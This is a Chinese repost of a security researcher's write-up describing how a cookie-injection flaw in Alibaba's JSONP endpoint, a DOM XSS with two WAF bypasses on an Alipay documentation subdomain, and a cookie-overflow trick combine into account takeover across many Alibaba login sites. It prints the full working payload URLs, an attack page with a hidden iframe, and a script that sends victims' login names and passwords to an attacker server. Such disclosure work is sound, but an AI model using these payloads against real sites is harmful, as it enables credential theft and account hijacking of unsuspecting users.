一个账户接管几乎所有阿里巴巴网站(CSRF漏洞+WAF绕过)

news/2024/5/19 9:22:52/文章来源:https://blog.csdn.net/weixin_30437481/article/details/98886640

场景

文章是关于某些客户端漏洞导致几个阿里巴巴网站的帐户被接管。

549050-20190415102530226-514511175.png

条件

TL;DR 必要条件,例如JSONP,某些浏览器处理cookie等行为。

攻击原理

大多数阿里巴巴的网站加载并执行外部JavaScript对象,JavaScript代码从名为的cookie中获取值uid。攻击者可以uid代表受害者将价值改变为恶意有效Payload,从而导致帐户接管。

漏洞发现的简要步骤

1、找到一个URL(ynuf.alipay.com),返回在许多阿里巴巴网站上执行的JavaScript代码。

2、实现了提到的URL反映了JavaScript代码中的cookie值。

3、搜索* .alipay.com以查找XSS以控制cookie值。

4、在子域中找到了潜在的基于DOM的XSS。

5、操纵入口点以避开两次WAF。

6、使用一种不常见的技术来重写cookie的值。

7、在许多网站上执行JavaScript代码,例如login.alibaba.com

8、写了一个漏洞利用代码来接管alibaba.com上的任何帐户

9、几乎最新版本的谷歌浏览器和Firefox浏览器已对最终版本进行了测试。文章末尾已经附上示范POC。

细节

什么是JSONP?

JSONP是一种发送JSON数据的方法。

  • 可以加载外部JavaScript对象
  • 不使用XMLHttpRequest对象
  • 不太安全
  • 浏览器中的旁路SOP

549050-20190415103051411-1287443953.png

JSONP请求/响应的示例

易受攻击的外部JavaScript对象

如图所示,阿里巴巴的许多网站从以下网址加载外部JavaScript对象:

https://ynuf.alipay.com/uid

549050-20190415103305542-1395919594.png

JavaScrip代码:

um.__idcb("5cb143654b94f4a5")

这是一个简单的代码。仔细观察发现,5cb143654b94f4a5取自uid先前在ynuf.alipay.com域中设置的cookie 。如果用户没有cookie,则服务器会在响应中设置相应的值,否则取其值。工作流程如图:

549050-20190415103447148-170252943.png

JSONP Call阿里巴巴的两个域名

找到缺陷的顺序,第一个请求/响应:

GET /uid HTTP/1.1
Host: ynuf.alipay.com
User-Agent: curl/7.47.0
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 17:38:10 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
ETag: d181bf00669d40c0
Set-Cookie: uid=d181bf00669d40c0; expires=Thu, 30 Jan 2031 08:00:00 GMT
Cache-Control: max-age=315360000, private
Server: Tengine/Aserver
Strict-Transport-Security: max-age=0
Timing-Allow-Origin: *
um.__idcb("26fadf90bac907a7")

第二次请求/回复:

GET /uid HTTP/1.1
Host: ynuf.alipay.com
User-Agent: curl/7.47.0
Cookie: uid=d181bf00669d40c0
Accept: */*
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 08:47:40 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
ETag: test
Cache-Control: max-age=315360000, private
Server: Tengine/Aserver
Strict-Transport-Security: max-age=0
Timing-Allow-Origin: *
um.__idcb("d181bf00669d40c0")

第三个请求/回复:

GET /uid HTTP/1.1
Host: ynuf.alipay.com
User-Agent: curl/7.47.0
Cookie: uid=")+alert("Injected
Accept: */*
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 08:47:40 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
ETag: test
Cache-Control: max-age=315360000, private
Server: Tengine/Aserver
Strict-Transport-Security: max-age=0
Timing-Allow-Origin: *
um.__idcb("")+alert("Injected")

由于没有对cookie值应用转义函数,因此可以注入恶意代码。什么样的漏洞导致控制cookie?

ynuf.alipay.com中的跨站点脚本

花一些时间寻找ynuf.alipay.com失败的XSS 。由于该网站功能较小。

Cookie中的重要说明

乍看之下,需要ynuf.alipay.com中的XSS来改变cookie的值。 根据 RFC6265,a.b.com可以设置具有域属性.b.com和a.b.com的cookie,其中浏览器自动将具有.b.com属性的cookie发送到b.com子域。

549050-20190415110314472-784270970.png

因此,通过x.y.alipay.com域,可以设置带有.alipay.com和.y.alipay.com属性的cookie。 Cookie由浏览器用于所有.alipay.com子域。 所以? 只需* .alipay.com中的一个小型XSS即可触发该链。 有效Payload如下:

uid=")+alert("xss;domain=.alipay.com

挖掘在*.alipay.com的XSS

Recon导致发现doc.open.alipay.com。 下面的访问URL重定向了用户。

https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&keyword=foo

仔细观察URL,发现JavaScript处理的重定向不是3xx标头。 查看代码还显示,可以通过向查询字符串添加articleId参数来停止重定向。

549050-20190415152228630-373532539.png

触发XSS的第一个简单测试是通过双引号打破这条线。

https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&keyword=foo">&articleId=bar

结果:

549050-20190415152341214-104662015.png

服务器端函数应用。

549050-20190415152904974-111912496.png

是否有机会得到XSS?

JavaScript的魔术

棘手的点

如果jQuery从表单中获取HTML编码值 .val(),则返回相应的HTML解码值。

<input id="input" value="&amp;&quot;" />

jQuery的:

$('#input').val() // return &"

回到查找漏洞的细节,仔细观察发现,doc.open.alipay.com体现keyword值的页面是由JavaScript产生的,构成该部分的JavaScript代码:

function h(b, e) {url = d.one(".J_ajaxUrl").val();var f = "keyword=" + (d.one(".J_Tagword") ? d.one(".J_Tagword").val() : d.one(".J_SearchKeyword").val()) + "&searchType=" + e;url.indexOf("?") > 0 ? url += "&" : url += "?",c({url: url + f + "&current=" + b,type: "post",dataType: "json",data: {},success: function(b) {if (200 == b.code) {var c = b.data;c.typeTotals;if (c.count > 0) {var g = [];c.results.length > 0 ? (a.each(c.results, function(a) {"0" == e ? g.push("<li>", '<h2><a href="' + a.link + '" target="_blank">' + a.title + "</a></h2>", '<div class="desc">' + a.content + "</div>", '<span class="time" style="margin-right: 10px">' + a.typeName + "</span>", '<span class="time">更新时间: ' + a.gmtModifiedStr + "</span>", "</li>") : g.push("<li>", '<h2><a href="' + a.link + '" target="_blank">' + a.title + "</a></h2>", '<div class="desc">' + a.content + "</div>", '<span class="time">更新时间: ' + a.gmtModifiedStr + "</span>", "</li>")}),d.all("ul", ".J_SearchList").html(g.join(""))) : d.all("ul", ".J_SearchList").html('<p style="margin-top:50px;font-size: 16px;">该类目下没有符合条件的搜索结果</p>'),a.each(d.all(".J_typeTotal"), function(a, b) {var e = d.all(a);e.parent();0 == b ? e.text(c.count) : e.text(c[l[b] + "Count"])}),0 == e ? k.changeTotalPage(Math.ceil(c.count / c.size)) : k.changeTotalPage(Math.ceil(c[l[e] + "Count"] / c.size)),k.setCurrentPage(c.current),d.all(window).scrollTop(0)} elsed.all("li", ".J_typeList").show(),d.all(".J_typeTotal").text(0),k.changeTotalPage(1),d.one("#platformId") && "1" == d.one("#platformId").val() ? d.all("ul", ".J_SearchList").html('<p style="margin-top:50px;font-size: 16px;">没有符合条件的搜索结果</p>') : d.all("ul", ".J_SearchList").html('<p style="margin-top:50px;font-size: 16px;">没有符合条件的搜索结果</p><p style="margin-top:10px;color: #0089cd;"><a target="_blank" href="https://open.taobao.com/doc2/docSearch?' + f + '">搜索淘宝开放平台 --\x3e</a></p>')}}})}

它是链接中重要的javascript代码。服务器以正确编码输入j_searchkeywork中的参数关键字。但是,考虑到第 3行,d.one(“.j_searchkeyword”).val()返回HTML解码值,该值在下面的几行代码插入到页面中,目的是注入XSS有效Payload,即使是以HTML编码格式,它也不是一个常用的基于DOM的XSS攻击向量:

549050-20190415165648066-297885919.png

发送最简单的XSS有效Payload。 然而,服务器端的清理很烦人。 数据流:

549050-20190415165841156-938194822.png

绕过服务器端清理

生成XSS的第一步是添加一个新的HTML标记。 但是,服务器正在对关键字参数传递的标签应用某种规则。 Fuzz模糊测试:

549050-20190415170031119-822857619.png

导致透露出以下规则/条件:

- 1、删除属性并关闭有效HTML标记的标记,`<a href>`转为`<a> </a>`
- 2、无效标签被递归完全删除。 <blah>或<bl<blah>ah>被完全过滤。

更多模糊测试

549050-20190415170932953-343426470.png

>< 预计会变成&gt;&lt;。 但是上一个请求/响应显示了其他内容,很快发现服务器正在应用自定义HTML编码器功能:

1、如果输入未被识别为有效的html编码值 - > html_encode(value)
2、如果输入被识别为有效的HTML编码值 - >返回值

这个小瑕疵是一个很大的漏洞。 神奇的是输入了:

">%26gt;script%26lt;

549050-20190415171430227-6865324.png

然后,注入XSS有效Payload:

https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&articleId=bar&keyword=">%26gt;script%26lt;

导致:

549050-20190415171612154-267716329.png

WAF阻止了请求。

绕过WAF

利用服务器端清理功能的第二条规则删除无效的HTML标记)可以成功绕过WAF。

549050-20190415171807669-1747578886.png

数据流:

549050-20190415171853018-215500156.png

但是没有效果。 因为JavaScript发出了另一个AJAX请求。 考虑到gist代码的第10行,之前提到的JavaScript库依赖于AJAX请求。 请求是:

https://doc.open.alipay.com/doc2/search.htm?platformId&keyword="><script>&searchType=0&current=1

当检测到有效Payload时,WAF阻止了第二个请求(毫无疑问,任何WAF都应该阻止"><script>)。坏消息是根据库规则,只有200状态代码才显示出有效Payload(gist代码中的第11行)

if (200 == b.code) {

因此,需要有效Payload同时绕过两个请求中的WAF规则。
这里需要更多的模糊测试。 测试了几种载体。 之后,发现了ontoggle有效Payload:

<details/open/ontoggle=JS>

这绕过了AJAX请求中的WAF。

549050-20190415172803826-363414371.png

感谢HTML 5.所以最终的有效Payload是:

https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&articleId=bar&keyword=">%26gt;details%2fopen%2fontoggle=%26lt;

导致发送第二个AJAX请求:

https://doc.open.alipay.com/doc2/search.htm?platformId&keyword="><details/open/ontoggle=>&searchType=0&current=1

两者都可以从WAF接受。 答对了!

549050-20190415173041256-2096415664.png

场景:
1、构建恶意HTML网页
2、诱骗用户访问我们的网页
3、设置恶意cookie
4、JavaScript被注入许多阿里巴巴的子域
5、获取证书

漏洞利用问题:

由于ynuf.alipay.com使用uid名称为其域设置cookie,因此无法从其他域覆盖。 使用.alipay.com属性添加另一个具有相同名称的cookie也无法解决问题,因为如果域中存在两个名为xxx的cookie,则默认行为 是浏览器将旧cookie放在HTTP请求的前面,这样服务器就可以获取第一个cookie

549050-20190415174034881-850702891.png

覆盖Cookie

测试表明,浏览器可以为每个域节省有限数量的cookie。例如,谷歌浏览器为一个域节省了不到150个cookie,而Firefox节省了大约200个。更多细节:

http://browsercookielimits.squawky.net/

因此,有效Payload很简单:

for(var i=0;i<1000;i++){document.cookie=i+'=1;domain=.alipay.com'
}
document.cookie='uid=foo;domain=.alipay.com;path=/'

因此攻击向量uid通过添加许多垃圾cookie 来消除旧cookie,添加由恶意Payload填充的新uid cookie。

告警有效Payload

由于WAF阻断了")+alert("xss,因此等效值被替换为绕过WAF的编码值:

document.cookie='uid=\x22\x29\x2b\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73;domain=.alipay.com;path=/'

最终组合

最终的有效Payload比预期的要简单:

https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&&articleId=bar&keyword=1%22%3E%26lt;details/open/ontoggle=%22for(var+i=0;i%3C1000;i%2b%2b){document.cookie=i%2b%27=1;domain=.alipay.com%27}document.cookie=%27uid=\x22\x29\x2b\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73;domain=.alipay.com;path=/%27%22%3E

访问上面的URL会在cookie中注入恶意JavaScript代码,该代码在阿里巴巴公司的许多域中执行,例如:

https://login.alibaba.com/
https://passport.alibaba.com/mini_login.htm?appName=hrjob
https://accounts.alibaba.com/register/cnfm_reg.htm
https://login.taobao.com/member/login.jhtml
https://reg.taobao.com/member/reg/fill_mobile.htm
https://login.aliexpress.com/
http://tp.amap.com/
http://id.amap.com/
https://passport.alibaba-inc.com/ssoLogin.htm?APP_NAME=iworkmanage
https://ipp.alibabagroup.com/login.htm
https://mp.dayu.com/
https://passport.umeng.com/login
https://passport.damai.cn/loginEn

显然,有更多的网站受到影响。

最后目标

最终目标是在阿里巴巴的网站上进行账户接管。 诱导用户点击链接,然后如果用户下次登录,该帐户将被泄露。 触发漏洞的链接源:

<html>
<center>
<img src='https://pbs.twimg.com/profile_images/701729713392320512/PaYM_TF4_400x400.jpg'><img>
<iframe src="https://doc.open.alipay.com/doc2/docSearch.htm?treeId=300&articleId=bar&keyword=1%22%3E%26lt;details/open/ontoggle=%22for(var+i=0;i%3C1000;i%2b%2b){document.cookie=i%2b%27=1;domain=.alipay.com%27}document.cookie=%27uid=\x22\x29\x2b\x28\x73\x63\x72\x69\x70\x74\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x2c\x73\x63\x72\x69\x70\x74\x2e\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x78\x70\x6c\x2e\x6a\x73\x27\x2c\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x62\x6f\x64\x79\x2e\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64\x28\x73\x63\x72\x69\x70\x74\x29\x29\x2b\x28\x22;domain=.alipay.com;path=/%27%22%3E" style="width:0;height:0;border:0; border:none;"></iframe>
</html>

iframe src使用以下有效Payload而不是alert来注入恶意JavaScript文件并动态加载:

"\")+(script=document.createElement('script'),script.src='https://myserver/xpl.js',document.body.appendChild(script))+(\""

有效Payload放在https://myserver/xpl.js:

document.forms[0].onsubmit = function() {var u = document.getElementById('fm-login-id');var p = document.getElementById('fm-login-password');var s = new XMLHttpRequets();s.open('POST', 'https://myserver/xxx-alibaba/');s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');s.onreadystatechange = function() {if (s.readState == 4) {document.forms[0].submit();}}s.send(`u=${u}&p=${p}`);return false;
}

最终,在用户访问攻击者的链接并登录https://login.alibaba.com/后,凭据将被盗并保存在https://myserver/xxx-alibaba/data.txt中:

{"u":"alibaba@alibaba.com","p":"password"}

帐户接管完成。

演示

https://youtu.be/PA9UeftvAYY

参考

https://medium.com/@y.shahinzadeh/chaining-multiple-vulnerabilities-waf-bypass-to-account-takeover-in-almost-all-alibabas-websites-f8643eaa2855

转载于:https://www.cnblogs.com/17bdw/p/10709393.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_781940.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

(亚马逊云)10分钟-快速启动基于 Odoo 的电商网站

文章目录1. 引言2. 快速启动Odoo电商网站1. 注册2. 创建Amazon EC2实例3. 为Amazon EC2 实例绑定弹性IP地址4. 获取Odoo登录密码5. 登入Odoo网站管理后台6. 创建EC 2 映像作为备份7. 可选项3. 测评感受优点福利首先给出亚马逊云的官方实操教程链接&#xff1a; 地址如今的时代&…

正则爬取某段子网站前20页段子(request库)

首先还是谷歌浏览器抓包对该网站数据进行分析&#xff0c;结果如下&#xff1a; 该网站地址&#xff1a;http://www.budejie.com/text该网站数据都是通过html页面进行展示&#xff0c;网站url默认为第一页&#xff0c;http://www.budejie.com/text/2为第二页&#xff0c;以此类…

一键 图_高效抠图PS竟全然不是对手?堪称黑科技的AI一键抠图网站

[PConline 应用]“去背”一直是PS里的术语&#xff0c;只不过现在用得越来越频繁了。去除照片背景&#xff0c;意味着你可以随时随地根据自己的需要替换背景&#xff0c;满足设计或者“全球旅行”的梦想。当然就像很多PS梦想神器一样&#xff0c;“去背”说起来容易做起来难&am…

nifi 读取mysql_使用NiFi简单的从网站获取数据写入到mysql数据库

最近稍微研究了下etl工具nifi&#xff0c;它是Apache下面的一个项目&#xff0c;是用作数据流处理的&#xff0c;具体的就不多做介绍了&#xff0c;网上也有很多介绍&#xff0c;官网是https://nifi.apache.org/docs.html&#xff0c;我在这里做了一个从中移物联网onenet平台抽…

dw通过iis运行asp网站总结

ASP站点主要是结合iis和dw软件运行和浏览的 1、首先在本地先建立一个测试文件夹webs 2、打开iis管理器 3、建立创建网站 这里有个 4、dw中创建站点&#xff0c;并导入asp项目 下边的url是根据iis中配置的端口号和主机名组成的&#xff1a; 最后运行浏览asp页面 转载于:https://…

[转] 网站性能优化之------------- 数据库及服务器架构篇

转载自: http://blog.163.com/dangzhengtaoyeah/blog/static/7780087420098232213289/?fromdm&fromSearch&isFromSearchEngineyes 1、Web Server 与 DB Server 分离 小型网站或 B/S 项目&#xff0c;因同时在线人数不多&#xff0c;尚可让同一台物理主机&#xff0c;既…

网站元数据meta标签的含义和用法

随着HTML5的流行和Web技术的不断演变&#xff0c;Meta标签队伍也越来越壮大&#xff0c;从Windows XP的IE6到如今Windows 7、Windows 8的IE9、IE10、IE11&#xff0c;对Html5的支持越来越好&#xff0c;html meta标签的功能作用也越来越强大。 首先&#xff0c;先说一下最初产生…

tornado+bootstrap急速搭建你自己的网站

bootstrap既然是这么的流行又能省很多的事为什么不用他呢&#xff1f;再加上牛X的produced by FB的tornado简直如虎添翼了&#xff01; 1. 安装配置 安装所需要的库等内容。这里没什么需要多讲的。tornado直接用easy_install或者pip。bootstrap直接下下来就OK了。当然还需要下载…

网站前端_Bootstrap.基础入门.0001.模版标准/样式标准/脚本标准入门?

简单介绍:1. Bootstrap于2010年Twitter开源将常见的CSS布局小组件和JS插件进行了封装,大大规范且提高了代码质量及开发效率.2. Bootstrap包含完整的基础CSS插件,丰富的预定义样式表,基于JQuery的JS插件集,非常灵活的响应式删栏系统,支持跨平台,且完全支持自定义.注意: Bootstra…

IT老鸟带你解决银行招标网站[金采网]无法注册供应商问题

目录 一、金采网介绍 二、背景及问题 三、分析思路 四、解决办法 五、扩展解决思路 六、最后感想 一、金采网介绍 金采网(http://www.cfcpn.com)是中国金融学会金融采购专业委员会对外的工作平台&#xff0c;是国内唯一的、专业服务金融行业采购业务的权威网站平台。 金…

QA小课堂:一个网站或者APP开发要多少钱

经常遇到朋友问我&#xff1a;“开发一个京东商城需要多少钱&#xff1f;开发一个滴滴打车需要多少钱&#xff1f;”类似这样的需求&#xff0c;就连我这样一名伪开发者都不愿意去骗客户或者朋友&#xff0c;因为这种问题是很难回答出来的。为什么这么说呢&#xff1f;要知道类…

selenium测试https网站

为什么80%的码农都做不了架构师&#xff1f;>>> 当访问一个https的网站&#xff0c;通常浏览器会收到一份证书&#xff0c;该证书包含了服务器的公钥以及CA的签名 服务器的公钥 服务器一般会生成一对密钥&#xff0c;公钥和私钥 服务器把公钥放在证书中请求CA的签名…

给你的网站添加支付宝即时到帐按钮

前言 大家都知道PayPal有一个非常使用的「一键转账」功能&#xff0c;但是自从支付宝的个人收款主页停止服务后&#xff0c;支付宝已经无法实现该功能了&#xff0c;那有我天朝人民想不到的办法呢&#xff1f;今天博猪就来教大家使用一个极其简单的 form 标签经过 POST 可以一键…

网站安全狗IIS版、服务器安全狗Windows版

2019独角兽企业重金招聘Python工程师标准>>> 2016年11月2日&#xff0c;云安全服务与解决方案提供商安全狗升级发布网站安全狗Windows_IIS版本&#xff0c;版本号为 V4.0.15716正式版&#xff0c;该版本优化了多个功能服务&#xff0c;目前安全狗官网http://www.saf…

hexo的next主题个性化教程:打造炫酷网站

注意下面那些图床失效了&#xff0c;可以在这里看http://shenzekun.cn/hexo%E7%9A%84next%E4%B8%BB%E9%A2%98%E4%B8%AA%E6%80%A7%E5%8C%96%E9%85%8D%E7%BD%AE%E6%95%99%E7%A8%8B.html 看到有些next主题的网站很炫酷&#xff0c;那么是怎么配置的呢&#xff1f;接下来我会讲一讲…

《网站设计 开发 维护 推广 从入门到精通》——1.2 网页美工常用工具

本节书摘来自异步社区《网站设计 开发 维护 推广 从入门到精通》一书中的第1章&#xff0c;第1.2节&#xff0c;作者&#xff1a; 何新起 , 娄彦杰 更多章节内容可以访问云栖社区“异步社区”公众号查看。 1.2 网页美工常用工具 制作网页第一件事就是要选定网页制作软件。虽然…

LVS(负载均衡)+keepalived(HA)+Nginx(反向代理)+Web(动静态网站服务器)

考虑到LVS和Nginx的缺点&#xff08;由于LVS采用的是同步请求转发策略而Nginx采用的是异步转发策略&#xff0c;结合两者的缺点:作为负载均衡服务器的Nginx和LVS处理相同的请求时&#xff0c;所有的请求和响应流量都会经过Nginx服务器&#xff0c;但是使用LVS时&#xff0c;仅请…

快播CEO认罪,成人网站对技术的要求有多高?

快播涉传播淫秽物品案昨日在海淀法院开庭审理。快播公司、王欣、张克东、牛文举均表示认罪悔罪。吴铭表示快播公司犯罪成立。 庭前法院委托鉴定机关&#xff0c;对涉案的四台缓存服务器的硬盘数据是否受到改写污染问题进行了鉴定。鉴定结论是&#xff1a;未发现硬盘中的视频文件…

收录高的网站关键词一定要这么布局

随着互联网的高速发展&#xff0c;网站几乎成了每一家企业后者公司不可缺少的一部分&#xff0c;网站也成了公司或者企业的第二个基地——线上展示。这个在网站建设的时候需要先给网站定位好&#xff0c;因为需要提前做好关键词的布局准备&#xff0c;虽然行业千千万&#xff0…

提供在线linux的网站,谁能提供一个在线免费学习Linux的网站?

楼主发表于:2008-04-21 19:46:20求一个可以在线学习LINUX 并且可以在线练习很多常用命令的网站 就是不用装linux 也可以练习linux的网站 谢谢。 对我有用[0]丢个板砖[0]引用举报管理TOP 回复次数:8 fox000002(糊糊。。楼主发表于:2008-04-21 19:46:20求一个可以在线学习LINUX 并…